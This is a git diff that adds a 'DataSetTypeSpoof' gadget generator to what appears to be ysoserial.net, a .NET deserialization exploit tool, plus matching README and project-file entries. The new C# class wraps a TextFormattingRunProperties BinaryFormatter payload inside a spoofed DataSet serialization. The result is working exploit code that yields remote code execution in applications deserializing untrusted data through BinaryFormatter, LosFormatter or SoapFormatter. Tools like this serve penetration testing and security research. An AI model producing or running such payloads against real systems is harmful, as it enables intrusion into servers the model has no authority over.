diff --git a/README.md b/README.md
index 9683591..bc0533b 100644
--- a/README.md
+++ b/README.md
@@ -46,6 +46,8 @@ ysoserial.net generates deserialization payloads for a variety of .NET formatter
Formatters: BinaryFormatter , LosFormatter , SoapFormatter
(*) DataSet
Formatters: BinaryFormatter , LosFormatter , SoapFormatter
+ (*) DataSetTypeSpoof
+ Formatters: BinaryFormatter , LosFormatter , SoapFormatter
(*) ObjectDataProvider (supports extra options: use the '--fullhelp' argument to view)
Formatters: DataContractSerializer (2) , FastJson , FsPickler , JavaScriptSerializer , Json.Net , SharpSerializerBinary , SharpSerializerXml , Xaml (4) , XmlSerializer (2) , YamlDotNet < 5.0.0
(*) PSObject [Target must run a system not patched for CVE-2017-8565 (Published: 07/11/2017)]
diff --git a/ysoserial/Generators/DataSetTypeSpoofGenerator.cs b/ysoserial/Generators/DataSetTypeSpoofGenerator.cs
new file mode 100644
index 0000000..7c16631
--- /dev/null
+++ b/ysoserial/Generators/DataSetTypeSpoofGenerator.cs
@@ -0,0 +1,102 @@
+using System;
+using System.Collections.Generic;
+using System.Data;
+using System.IO;
+using System.Runtime.Serialization;
+using System.Runtime.Serialization.Formatters.Binary;
+using ysoserial.Helpers;
+
+namespace ysoserial.Generators
+{
+ public class DataSetTypeSpoofGenerator : DataSetGenerator
+ {
+ public override string Name()
+ {
+ return "DataSetTypeSpoof";
+ }
+
+ public override string Contributors()
+ {
+ return "Soroush Dalili, Markus Wulftange, Jang";
+ }
+
+ public override object Generate(string formatter, InputArgs inputArgs)
+ {
+ byte[] init_payload =
+ (byte[]) new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
+ DataSetSpoofMarshal payloadDataSetMarshal = new DataSetSpoofMarshal(init_payload);
+ if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase)
+ || formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase)
+ || formatter.Equals("soapformatter", StringComparison.OrdinalIgnoreCase))
+ {
+ return Serialize(payloadDataSetMarshal, formatter, inputArgs);
+ }
+ else
+ {
+ throw new Exception("Formatter not supported");
+ }
+ }
+ }
+
+ // https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf
+ [Serializable]
+ public class DataSetSpoofMarshal : ISerializable
+ {
+ byte[] _fakeTable;
+
+ public void GetObjectData(SerializationInfo info, StreamingContext context)
+ {
+ // info.SetType(typeof(System.Data.DataSet));
+ info.AssemblyName = "mscorlib";
+ info.FullTypeName = typeof(System.Data.DataSet).AssemblyQualifiedName;
+ info.AddValue("DataSet.RemotingFormat", System.Data.SerializationFormat.Binary);
+ info.AddValue("DataSet.DataSetName", "");
+ info.AddValue("DataSet.Namespace", "");
+ info.AddValue("DataSet.Prefix", "");
+ info.AddValue("DataSet.CaseSensitive", false);
+ info.AddValue("DataSet.LocaleLCID", 0x409);
+ info.AddValue("DataSet.EnforceConstraints", false);
+ info.AddValue("DataSet.ExtendedProperties", (System.Data.PropertyCollection) null);
+ info.AddValue("DataSet.Tables.Count", 1);
+ info.AddValue("DataSet.Tables_0", _fakeTable);
+ }
+
+ public void SetFakeTable(byte[] bfPayload)
+ {
+ _fakeTable = bfPayload;
+ }
+
+ public DataSetSpoofMarshal(byte[] bfPayload)
+ {
+ SetFakeTable(bfPayload);
+ }
+
+ public DataSetSpoofMarshal(object fakeTable) : this(fakeTable, new InputArgs())
+ {
+ // This won't use anything we might have defined in ysoserial.net BinaryFormatter process (such as minification)
+ }
+
+ public DataSetSpoofMarshal(object fakeTable, InputArgs inputArgs)
+ {
+ MemoryStream stm = new MemoryStream();
+ if (inputArgs.Minify)
+ {
+ ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter fmtLocal =
+ new ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter();
+ fmtLocal.Serialize(stm, fakeTable);
+ }
+ else
+ {
+ BinaryFormatter fmt = new BinaryFormatter();
+ fmt.Serialize(stm, fakeTable);
+ }
+
+ SetFakeTable(stm.ToArray());
+ }
+
+ public DataSetSpoofMarshal(MemoryStream ms)
+ {
+ SetFakeTable(ms.ToArray());
+ }
+ }
+}
\ No newline at end of file
diff --git a/ysoserial/ysoserial.csproj b/ysoserial/ysoserial.csproj
index 628729e..f792221 100755
--- a/ysoserial/ysoserial.csproj
+++ b/ysoserial/ysoserial.csproj
@@ -158,6 +158,7 @@
+